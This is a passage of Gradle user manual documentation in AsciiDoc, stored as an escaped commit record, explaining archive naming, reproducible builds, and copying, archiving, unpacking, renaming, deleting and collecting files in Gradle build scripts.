link:{groovyDslPath}\/org.gradle.api.tasks.bundling.AbstractArchiveTask.html[AbstractArchiveTask], but we have also summarized the main ones here:\n\n`archiveFileName` \u2014 `Property<String>`, default: `__archiveBaseName__-__archiveAppendix__-__archiveVersion__-__archiveClassifier__.__archiveExtension__`::\nThe complete file name of the generated archive. 
If any of the properties in the default value are empty, their '-' separator is dropped.\n\n`archiveFile` \u2014 `Provider<RegularFile>`, _read-only_, default: `__destinationDirectory__\/__archiveFileName__`::\nThe absolute file path of the generated archive.\n\n`destinationDirectory` \u2014 `DirectoryProperty`, default: depends on archive type::\nThe target directory in which to put the generated archive. By default, JARs and WARs go into `$buildDir\/libs`. ZIPs and TARs go into `$buildDir\/distributions`.\n\n`archiveBaseName` \u2014 `Property<String>`, default: `__project.name__`::\nThe base name portion of the archive file name, typically a project name or some other descriptive name for what it contains.\n\n`archiveAppendix` \u2014 `Property<String>`, default: `null`::\nThe appendix portion of the archive file name that comes immediately after the base name. It is typically used to distinguish between different forms of content, such as code and docs, or a minimal distribution versus a full or complete one.\n\n`archiveVersion` \u2014 `Property<String>`, default: `__project.version__`::\nThe version portion of the archive file name, typically in the form of a normal project or product version.\n\n`archiveClassifier` \u2014 `Property<String>`, default: `null`::\nThe classifier portion of the archive file name. Often used to distinguish between archives that target different platforms.\n\n`archiveExtension` \u2014 `Property<String>`, default: depends on archive type and compression type::\nThe filename extension for the archive. By default, this is set based on the archive task type and the compression type (if you're creating a TAR). Will be one of: `zip`, `jar`, `war`, `tar`, `tgz` or `tbz2`. You can of course set this to a custom extension if you wish.\n\n[[sec:sharing_content_between_multiple_archives]]\n=== Sharing content between multiple archives\n\n<<#sub:sharing_copy_specs,As described earlier>>, you can use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:copySpec(org.gradle.api.Action)[Project.copySpec(org.gradle.api.Action)] method to share content between archives.\n\n[[sec:reproducible_archives]]\n=== Reproducible builds\n\nSometimes it's desirable to recreate archives exactly the same, byte for byte, on different machines. You want to be sure that building an artifact from source code produces the same result no matter when and where it is built. This is necessary for projects like https:\/\/reproducible-builds.org\/[reproducible-builds.org].\n\nReproducing the same byte-for-byte archive poses some challenges since the order of the files in an archive is influenced by the underlying file system. Each time a ZIP, TAR, JAR, WAR or EAR is built from source, the order of the files inside the archive may change. Files that only have a different timestamp also cause differences in archives from build to build. All link:{groovyDslPath}\/org.gradle.api.tasks.bundling.AbstractArchiveTask.html[AbstractArchiveTask] (e.g. Jar, Zip) tasks shipped with Gradle include support for producing reproducible archives.\n\nFor example, to make a `Zip` task reproducible you need to set link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html#org.gradle.api.tasks.bundling.Zip:reproducibleFileOrder[Zip.isReproducibleFileOrder()] to `true` and link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html#org.gradle.api.tasks.bundling.Zip:preserveFileTimestamps[Zip.isPreserveFileTimestamps()] to `false`. 
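\n\nFor instance, a minimal sketch of those two settings on a single task might look like this (the task name and source directory are illustrative):\n\n[source,groovy]\n----\ntasks.register('myZip', Zip) {\n    from 'src\/dist'\n    \/\/ Order archive entries consistently, independent of the file system\n    reproducibleFileOrder = true\n    \/\/ Write a fixed timestamp for every entry\n    preserveFileTimestamps = false\n}\n----\n\n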
In order to make all archive tasks in your build reproducible, consider adding the following configuration to your build file:\n\n.Activating reproducible archives\n====\ninclude::sample[dir=\"snippets\/files\/archives\/groovy\",files=\"build.gradle[tags=reproducible]\"]\ninclude::sample[dir=\"snippets\/files\/archives\/kotlin\",files=\"build.gradle.kts[tags=reproducible]\"]\n====\n\nOften you will want to publish an archive, so that it is usable from another project.\nThis process is described in <<cross_project_publications.adoc#cross_project_publications,Cross-Project publications>>.\n","old_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[working_with_files]]\n= Working With Files\n\nAlmost every Gradle build interacts with files in some way: think source files, file dependencies, reports and so on. That's why Gradle comes with a comprehensive API that makes it simple to perform the file operations you need.\n\nThe API has two parts to it:\n\n * Specifying which files and directories to process\n * Specifying what to do with them\n\nThe <<#sec:locating_files,File paths in depth>> section covers the first of these in detail, while subsequent sections, like <<#sec:copying_files,File copying in depth>>, cover the second. To begin with, we'll show you examples of the most common scenarios that users encounter.\n\n[[sec:copying_single_file_example]]\n== Copying a single file\n\nYou copy a file by creating an instance of Gradle's builtin link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html[Copy] task and configuring it with the location of the file and where you want to put it. This example mimics copying a generated report into a directory that will be packed into an archive, such as a ZIP or TAR:\n\n.How to copy a single file\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-single-file-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-single-file-example]\"]\n====\n\nThe link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method is used to create a file or directory path relative to the current project and is a common way to make build scripts work regardless of the project path. 
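\n\nA condensed sketch of the same idea in the Groovy DSL (the report and directory names are illustrative):\n\n[source,groovy]\n----\ntasks.register('copyReport', Copy) {\n    \/\/ file() resolves these relative paths against the project directory\n    from file(\"$buildDir\/reports\/my-report.pdf\")\n    into file(\"$buildDir\/toArchive\")\n}\n----\n\n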
The file and directory paths are then used to specify what file to copy using link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:from(java.lang.Object++[]++)[Copy.from(java.lang.Object...)] and which directory to copy it to using link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:into(java.lang.Object)[Copy.into(java.lang.Object)].\n\nYou can even use the path directly without the `file()` method, as explained early in the section <<#sec:copying_files,File copying in depth>>:\n\n.Using implicit string paths\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-single-file-example-without-file-method]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-single-file-example-without-file-method]\"]\n====\n\nAlthough hard-coded paths make for simple examples, they also make the build brittle. It's better to use a reliable, single source of truth, such as a task or shared project property. In the following modified example, we use a report task defined elsewhere that has the report's location stored in its `outputFile` property:\n\n.Prefer task\/project properties over hard-coded paths\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-single-file-example-with-task-properties]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-single-file-example-with-task-properties]\"]\n====\n\nWe have also assumed that the reports will be archived by `archiveReportsTask`, which provides us with the directory that will be archived and hence where we want to put the copies of the reports.\n\n[[sec:copying_multiple_files_example]]\n== Copying multiple files\n\nYou can extend the previous examples to multiple files very easily by providing multiple arguments to `from()`:\n\n.Using multiple arguments with from()\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-multiple-files-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-multiple-files-example]\"]\n====\n\nTwo files are now copied into the archive directory. You can also use multiple `from()` statements to do the same thing, as shown in the first example of the section <<#sec:copying_files, File copying in depth>>.\n\nNow consider another example: what if you want to copy all the PDFs in a directory without having to specify each one? To do this, attach inclusion and\/or exclusion patterns to the copy specification. 
Here we use a string pattern to include PDFs only:\n\n.Using a flat filter\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-multiple-files-with-flat-filter-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-multiple-files-with-flat-filter-example]\"]\n====\n\nOne thing to note, as demonstrated in the following diagram, is that only the PDFs that reside directly in the `reports` directory are copied:\n\n.The effect of a flat filter on copying\nimage::copy-with-flat-filter-example.png[]\n\nYou can include files in subdirectories by using an Ant-style glob pattern (`\\**\/*`), as done in this updated example:\n\n.Using a deep filter\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-multiple-files-with-deep-filter-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-multiple-files-with-deep-filter-example]\"]\n====\n\nThis task has the following effect:\n\n.The effect of a deep filter on copying\nimage::copy-with-deep-filter-example.png[]\n\nOne thing to bear in mind is that a deep filter like this has the side effect of copying the directory structure below `reports` as well as the files. If you just want to copy the files without the directory structure, you need to use an explicit `fileTree(_dir_) { _includes_ }.files` expression. We talk more about the difference between file trees and file collections in the <<#sec:file_trees,File trees>> section.\n\nThis is just one of the variations in behavior you're likely to come across when dealing with file operations in Gradle builds. Fortunately, Gradle provides elegant solutions to almost all those use cases. Read the _in-depth_ sections later in the chapter for more detail on how the file operations work in Gradle and what options you have for configuring them.\n\n[[sec:copying_directories_example]]\n== Copying directory hierarchies\n\nYou may have a need to copy not just files, but the directory structure they reside in as well. This is the default behavior when you specify a directory as the `from()` argument, as demonstrated by the following example that copies everything in the `reports` directory, including all its subdirectories, to the destination:\n\n.Copying an entire directory\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-directory-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-directory-example]\"]\n====\n\nThe key aspect that users struggle with is controlling how much of the directory structure goes to the destination. In the above example, do you get a `toArchive\/reports` directory or does everything in `reports` go straight into `toArchive`? The answer is the latter. If a directory is part of the `from()` path, then it _won't_ appear in the destination.\n\nSo how do you ensure that `reports` itself is copied across, but not any other directory in `$buildDir`? The answer is to add it as an include pattern:\n\n.Copying an entire directory, including itself\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-directory-including-itself-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-directory-including-itself-example]\"]\n====\n\nYou'll get the same behavior as before except with one extra level of directory in the destination, i.e. 
`toArchive\/reports`.\n\nOne thing to note is how the `include()` directive applies only to the `from()`, whereas the directive in the previous section applied to the whole task.\nThese different levels of granularity in the copy specification allow you to easily handle most requirements that you will come across.\nYou can learn more about this in the section on <<sub:using_child_copy_specifications,child specifications>>.\n\n[[sec:creating_archives_example]]\n== Creating archives (zip, tar, etc.)\n\nFrom the perspective of Gradle, packing files into an archive is effectively a copy in which the destination is the archive file rather than a directory on the file system. This means that creating archives looks a lot like copying, with all of the same features!\n\nThe simplest case involves archiving the entire contents of a directory, which this example demonstrates by creating a ZIP of the `toArchive` directory:\n\n.Archiving a directory as a ZIP\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=create-archive-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=create-archive-example]\"]\n====\n\nNotice how we specify the destination and name of the archive instead of an `into()`: both are required. You often won't see them explicitly set, because most projects apply the <<base_plugin.adoc#base_plugin,Base Plugin>>. It provides some conventional values for those properties. The next example demonstrates this and you can learn more about the conventions in the <<#sec:archive_naming,archive naming>> section.\n\nEach type of archive has its own task type, the most common ones being link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html[Zip], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Tar.html[Tar] and link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar]. They all share most of the configuration options of `Copy`, including filtering and renaming.\n\nOne of the most common scenarios involves copying files into specified subdirectories of the archive. For example, let's say you want to package all PDFs into a `docs` directory in the root of the archive. This `docs` directory doesn't exist in the source location, so you have to create it as part of the archive. You do this by adding an `into()` declaration for just the PDFs:\n\n.Using the Base Plugin for its archive name convention\n====\ninclude::sample[dir=\"snippets\/files\/archivesWithBasePlugin\/groovy\",files=\"build.gradle[tags=create-archive-with-base-plugin-example]\"]\ninclude::sample[dir=\"snippets\/files\/archivesWithBasePlugin\/kotlin\",files=\"build.gradle.kts[tags=create-archive-with-base-plugin-example]\"]\n====\n\nAs you can see, you can have multiple `from()` declarations in a copy specification, each with its own configuration. 
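\n\nA condensed sketch of that shape might look like this (paths and names are illustrative):\n\n[source,groovy]\n----\ntasks.register('packageDistribution', Zip) {\n    from 'src\/dist'          \/\/ copied into the archive root\n    from(\"$buildDir\/toArchive\") {\n        include '*.pdf'\n        into 'docs'          \/\/ a subdirectory created inside the archive\n    }\n}\n----\n\n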
See <<#sub:using_child_copy_specifications,Using child copy specifications>> for more information on this feature.\n\n[[sec:unpacking_archives_example]]\n== Unpacking archives\n\nArchives are effectively self-contained file systems, so unpacking them is a case of copying the files from that file system onto the local file system \u2014\u00a0or even into another archive.\nGradle enables this by providing some wrapper functions that make archives available as hierarchical collections of files (<<sec:file_trees,file trees>>).\n\nThe two functions of interest are link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:zipTree(java.lang.Object)[Project.zipTree(java.lang.Object)] and link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:tarTree(java.lang.Object)[Project.tarTree(java.lang.Object)], which produce a link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html[FileTree] from a corresponding archive file. That file tree can then be used in a `from()` specification, like so:\n\n.Unpacking a ZIP file\n====\ninclude::sample[dir=\"snippets\/files\/archives\/groovy\",files=\"build.gradle[tags=unpack-archive-example]\"]\ninclude::sample[dir=\"snippets\/files\/archives\/kotlin\",files=\"build.gradle.kts[tags=unpack-archive-example]\"]\n====\n\nAs with a normal copy, you can control which files are unpacked via <<#sec:filtering_files,filters>> and even <<#sec:renaming_files,rename files>> as they are unpacked.\n\nMore advanced processing can be handled by the link:{groovyDslPath}\/org.gradle.api.tasks.AbstractCopyTask.html#eachFile(org.gradle.api.Action)[eachFile()] method. For example, you might need to extract different subtrees of the archive into different paths within the destination directory. The following sample uses the method to extract the files within the archive's `libs` directory into the root destination directory, rather than into a `libs` subdirectory:\n\n.Unpacking a subset of a ZIP file\n====\ninclude::sample[dir=\"snippets\/files\/archives\/groovy\",files=\"build.gradle[tags=unpack-archive-subset-example]\"]\ninclude::sample[dir=\"snippets\/files\/archives\/kotlin\",files=\"build.gradle.kts[tags=unpack-archive-subset-example]\"]\n====\n<1> Extracts only the subset of files that reside in the `libs` directory\n<2> Remaps the path of the extracted files into the destination directory by dropping the `libs` segment from the file path\n<3> Ignores the empty directories resulting from the remapping, see Caution note below\n\n[CAUTION]\n====\nYou cannot change the destination path of empty directories with this technique.\nYou can learn more in https:\/\/github.com\/gradle\/gradle\/issues\/2940[this issue].\n====\n\nIf you're a Java developer and are wondering why there is no `jarTree()` method, that's because `zipTree()` works perfectly well for JARs, WARs and EARs.\n\n[[sec:creating_uber_jar_example]]\n== Creating \"uber\" or \"fat\" JARs\n\nIn the Java space, applications and their dependencies were typically packaged as separate JARs within a single distribution archive. That still happens, but there is another approach that is now common: placing the classes and resources of the dependencies directly into the application JAR, creating what is known as an uber or fat JAR.\n\nGradle makes this approach easy to accomplish. Consider the aim: to copy the contents of other JAR files into the application JAR. 
All you need for this is the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:zipTree(java.lang.Object)[Project.zipTree(java.lang.Object)] method and the link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar] task, as demonstrated by the `uberJar` task in the following example:\n\n.Creating a Java uber or fat JAR\n====\ninclude::sample[dir=\"snippets\/files\/archivesWithJavaPlugin\/groovy\",files=\"build.gradle[tags=create-uber-jar-example]\"]\ninclude::sample[dir=\"snippets\/files\/archivesWithJavaPlugin\/kotlin\",files=\"build.gradle.kts[tags=create-uber-jar-example]\"]\n====\n\nIn this case, we're taking the runtime dependencies of the project \u2014 `configurations.runtimeClasspath.files` \u2014 and wrapping each of the JAR files with the `zipTree()` method. The result is a collection of ZIP file trees, the contents of which are copied into the uber JAR alongside the application classes.\n\n[[sec:creating_directories_example]]\n== Creating directories\n\nMany tasks need to create directories to store the files they generate, which is why Gradle automatically manages this aspect of tasks when they explicitly define file and directory outputs. You can learn about this feature in the <<more_about_tasks.adoc#sec:up_to_date_checks,incremental build>> section of the user manual. All core Gradle tasks ensure that any output directories they need are created if necessary using this mechanism.\n\nIn cases where you need to create a directory manually, you can use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:mkdir(java.lang.Object)[Project.mkdir(java.lang.Object)] method from within your build scripts or custom task implementations. Here's a simple example that creates a single `images` directory in the project folder:\n\n.Manually creating a directory\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=mkdir-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=mkdir-example]\"]\n====\n\nAs described in the {antManual}\/Tasks\/mkdir.html[Apache Ant manual], the `mkdir` task will automatically create all necessary directories in the given path and will do nothing if the directory already exists.\n\n[[sec:moving_files_example]]\n== Moving files and directories\n\nGradle has no API for moving files and directories around, but you can use the <<ant.adoc#ant,Apache Ant integration>> to easily do that, as shown in this example:\n\n.Moving a directory using the Ant task\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=move-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=move-example]\"]\n====\n\nThis is not a common requirement and should be used sparingly as you lose information and can easily break a build. It's generally preferable to copy directories and files instead.\n\n[[sec:renaming_files_example]]\n== Renaming files on copy\n\nThe files used and generated by your builds sometimes don't have names that suit, in which case you want to rename those files as you copy them. 
Gradle allows you to do this as part of a copy specification using the `rename()` configuration.\n\nThe following example removes the \"-staging-\" marker from the names of any files that have it:\n\n.Renaming files as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=rename-on-copy-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=rename-on-copy-example]\"]\n====\n\nYou can use regular expressions for this, as in the above example, or closures that use more complex logic to determine the target filename. For example, the following task truncates filenames:\n\n.Truncating filenames as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=truncate-names-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=truncate-names-example]\"]\n====\n\nAs with filtering, you can also apply renaming to a subset of files by configuring it as part of a child specification on a `from()`.\n\n[[sec:deleting_files_example]]\n== Deleting files and directories\n\nYou can easily delete files and directories using either the link:{groovyDslPath}\/org.gradle.api.tasks.Delete.html[Delete] task or the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:delete(org.gradle.api.Action)[Project.delete(org.gradle.api.Action)] method.\nIn both cases, you specify which files and directories to delete in a way supported by the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:files(java.lang.Object++[]++)[Project.files(java.lang.Object...)] method.\n\nFor example, the following task deletes the entire contents of a build's output directory:\n\n.Deleting a directory\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=delete-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=delete-example]\"]\n====\n\nIf you want more control over which files are deleted, you can't use inclusions and exclusions in the same way as for copying files.\nInstead, you have to use the builtin filtering mechanisms of `FileCollection` and `FileTree`.\nThe following example does just that to clear out temporary files from a source directory:\n\n.Deleting files matching a specific pattern\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=delete-with-filter-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=delete-with-filter-example]\"]\n====\n\nYou'll learn more about file collections and file trees in the next section.\n\n[[sec:locating_files]]\n== File paths in depth\n\nIn order to perform some action on a file, you need to know where it is, and that's the information provided by file paths. Gradle builds on the standard Java `{javaApi}\/java\/io\/File.html[File]` class, which represents the location of a single file, and provides new APIs for dealing with collections of paths. This section shows you how to use the Gradle APIs to specify file paths for use in tasks and file operations.\n\nBut first, an important note on using hard-coded file paths in your builds.\n\n\n[[sec:hard_coded_file_paths]]\n=== On hard-coded file paths\n\nMany examples in this chapter use hard-coded paths as string literals. This makes them easy to understand, but it's not good practice for real builds. 
The problem is that paths often change and the more places you need to change them, the more likely you are to miss one and break the build.\n\nWhere possible, you should use tasks, task properties, and <<writing_build_scripts.adoc#sec:extra_properties,project properties>> \u2014 in that order of preference \u2014 to configure file paths. For example, if you were to create a task that packages the compiled classes of a Java application, you should aim for something like this:\n\n.How to minimize the number of hard-coded paths in your build\n====\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/groovy\",files=\"build.gradle[tags=link-task-properties]\"]\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/kotlin\",files=\"build.gradle.kts[tags=link-task-properties]\"]\n====\n\nSee how we're using the `compileJava` task as the source of the files to package and we've created a project property `archivesDirPath` to store the location where we put archives, on the basis we're likely to use it elsewhere in the build.\n\nUsing a task directly as an argument like this relies on it having <<more_about_tasks.adoc#sec:task_inputs_outputs,defined outputs>>, so it won't always be possible.\nIn addition, this example could be improved further by relying on the Java plugin's convention for `destinationDirectory` rather than overriding it, but it does demonstrate the use of project properties.\n\n[[sec:single_file_paths]]\n=== Single files and directories\n\nGradle provides the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method for specifying the location of a single file or directory.\nRelative paths are resolved relative to the project directory, while absolute paths remain unchanged.\n\n[CAUTION]\n====\nNever use `new File(relative path)` because this creates a path relative to the current working directory (CWD). Gradle can make no guarantees about the location of the CWD, which means builds that rely on it may break at any time.\n====\n\nHere are some examples of using the `file()` method with different types of argument:\n\n.Locating files\n====\ninclude::sample[dir=\"snippets\/files\/file\/groovy\",files=\"build.gradle[tags=simple-params]\"]\ninclude::sample[dir=\"snippets\/files\/file\/kotlin\",files=\"build.gradle.kts[tags=simple-params]\"]\n====\n\nAs you can see, you can pass strings, `File` instances and `{javaApi}\/java\/nio\/file\/Path.html[Path]` instances to the `file()` method, all of which result in an absolute `File` object. You can find other options for argument types in the reference guide, linked in the previous paragraph.\n\nWhat happens in the case of multi-project builds? The `file()` method will always turn relative paths into paths that are relative to the current project directory, which may be a child project. If you want to use a path that's relative to the _root project_ directory, then you need to use the special link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:rootDir[Project.getRootDir()] property to construct an absolute path, like so:\n\n.Creating a path relative to a parent project\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\/project2\",files=\"build.gradle[tags=using-root-dir-property]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\/project2\",files=\"build.gradle.kts[tags=using-root-dir-property]\"]\n====\n\nLet's say you're working on a multi-project build in a `dev\/projects\/AcmeHealth` directory. 
You use the above example in the build of the library you're fixing \u2014 at `AcmeHealth\/subprojects\/AcmePatientRecordLib\/build.gradle`. The file path will resolve to the absolute version of `dev\/projects\/AcmeHealth\/shared\/config.xml`.\n\nThe `file()` method can be used to configure any task that has a property of type `File`. Many tasks, though, work on multiple files, so we look at how to specify sets of files next.\n\n[[sec:file_collections]]\n=== File collections\n\nA _file collection_ is simply a set of file paths that's represented by the link:{javadocPath}\/org\/gradle\/api\/file\/FileCollection.html[FileCollection] interface. _Any_ file paths.\nIt's important to understand that the file paths don't have to be related in any way, so they don't have to be in the same directory or even have a shared parent directory.\nYou will also find that many parts of the Gradle API use `FileCollection`, such as the copying API discussed later in this chapter and <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,dependency configurations>>.\n\nThe recommended way to specify a collection of files is to use the link:{javadocPath}\/org\/gradle\/api\/file\/ProjectLayout.html#files-java.lang.Object++...++-[ProjectLayout.files(java.lang.Object++...++)] method, which returns a `FileCollection` instance.\nThis method is very flexible and allows you to pass multiple strings, `File` instances, collections of strings, collections of ``File``s, and more.\nYou can even pass in tasks as arguments if they have <<more_about_tasks.adoc#sec:task_inputs_outputs,defined outputs>>.\nLearn about all the supported argument types in the reference guide.\n\n[CAUTION]\n====\nAlthough the `files()` method accepts `File` instances, never use `new File(relative path)` with it because this creates a path relative to the current working directory (CWD). Gradle can make no guarantees about the location of the CWD, which means builds that rely on it may break at any time.\n====\n\nAs with the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method covered in the <<#sec:single_file_paths,previous section>>, all relative paths are evaluated relative to the current project directory. The following example demonstrates some of the variety of argument types you can use \u2014 strings, `File` instances, a list and a `{javaApi}\/java\/nio\/file\/Path.html[Path]`:\n\n.Creating a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=simple-params]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=simple-params]\"]\n====\n\nFile collections have some important attributes in Gradle. They can be:\n\n * created lazily\n * iterated over\n * filtered\n * combined\n\n_Lazy creation_ of a file collection is useful when you need to evaluate the files that make up a collection at the time a build runs. 
In the following example, we query the file system to find out what files exist in a particular directory and then make those into a file collection:\n\n.Implementing a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=closure]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=closure]\"]\n====\n\n.Output of **`gradle -q list`**\n----\n> gradle -q list\ninclude::{snippetsPath}\/files\/fileCollections\/tests\/fileCollectionsWithClosure.out[]\n----\n\nThe key to lazy creation is passing a closure (in Groovy) or a `Provider` (in Kotlin) to the `files()` method. Your closure\/provider simply needs to return a value of a type accepted by `files()`, such as `List<File>`, `String`, `FileCollection`, etc.\n\n_Iterating over a file collection_ can be done through the `each()` method (in Groovy) or the `forEach` method (in Kotlin) on the collection or using the collection in a `for` loop. In both approaches, the file collection is treated as a set of `File` instances, i.e. your iteration variable will be of type `File`.\n\nThe following example demonstrates such iteration as well as how you can convert file collections to other types using the `as` operator or supported properties:\n\n.Using a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=usage]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=usage]\"]\n====\n\nYou can also see at the end of the example _how to combine file collections_ using the `+` and `-` operators to merge and subtract them. An important feature of the resulting file collections is that they are _live_. In other words, when you combine file collections in this way, the result always reflects what's currently in the source file collections, even if they change during the build.\n\nFor example, imagine `collection` in the above example gains an extra file or two after `union` is created. As long as you use `union` after those files are added to `collection`, `union` will also contain those additional files. The same goes for the `different` file collection.\n\nLive collections are also important when it comes to _filtering_. If you want to use a subset of a file collection, you can take advantage of the link:{javadocPath}\/org\/gradle\/api\/file\/FileCollection.html#filter-org.gradle.api.specs.Spec-[FileCollection.filter(org.gradle.api.specs.Spec)] method to determine which files to \"keep\". In the following example, we create a new collection that consists of only the files that end with .txt in the source collection:\n\n.Filtering a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=filtering-file-collections]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=filtering-file-collections]\"]\n====\n\n.Output of **`gradle -q filterTextFiles`**\n----\n> gradle -q filterTextFiles\ninclude::{snippetsPath}\/files\/fileCollections\/tests\/fileCollectionsFiltering.out[]\n----\n\nIf `collection` changes at any time, either by adding or removing files from itself, then `textFiles` will immediately reflect the change because it is also a live collection. 
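\n\nA minimal sketch of that live behavior, with illustrative file names:\n\n[source,groovy]\n----\ndef collection = files('src\/docs\/a.txt', 'src\/docs\/logo.png')\ndef textFiles = collection.filter { it.name.endsWith('.txt') }\n\nprintln textFiles.files.size()     \/\/ 1\n\/\/ files() returns a ConfigurableFileCollection, so we can append to it\ncollection.from('src\/docs\/b.txt')\nprintln textFiles.files.size()     \/\/ 2, because the filtered view is live\n----\n\n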
Note that the closure you pass to `filter()` takes a `File` as an argument and should return a boolean.\n\n[[sec:file_trees]]\n=== File trees\n\nA _file tree_ is a file collection that retains the directory structure of the files it contains and has the type link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html[FileTree]. This means that all the paths in a file tree must have a shared parent directory. The following diagram highlights the distinction between file trees and file collections in the common case of copying files:\n\n.The differences in how file trees and file collections behave when copying files\nimage::file-collection-vs-file-tree.png[]\n\nNOTE: Although `FileTree` extends `FileCollection` (an is-a relationship), their behaviors do differ. In other words, you can use a file tree wherever a file collection is required, but remember: a file collection is a flat list\/set of files, while a file tree is a file and directory hierarchy. To convert a file tree to a flat collection, use the link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html#getFiles--[FileTree.getFiles()] property.\n\nThe simplest way to create a file tree is to pass a file or directory path to the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:fileTree(java.lang.Object)[Project.fileTree(java.lang.Object)] method. This will create a tree of all the files and directories in that base directory (but not the base directory itself). The following example demonstrates how to use the basic method and, in addition, how to filter the files and directories using Ant-style patterns:\n\n.Creating a file 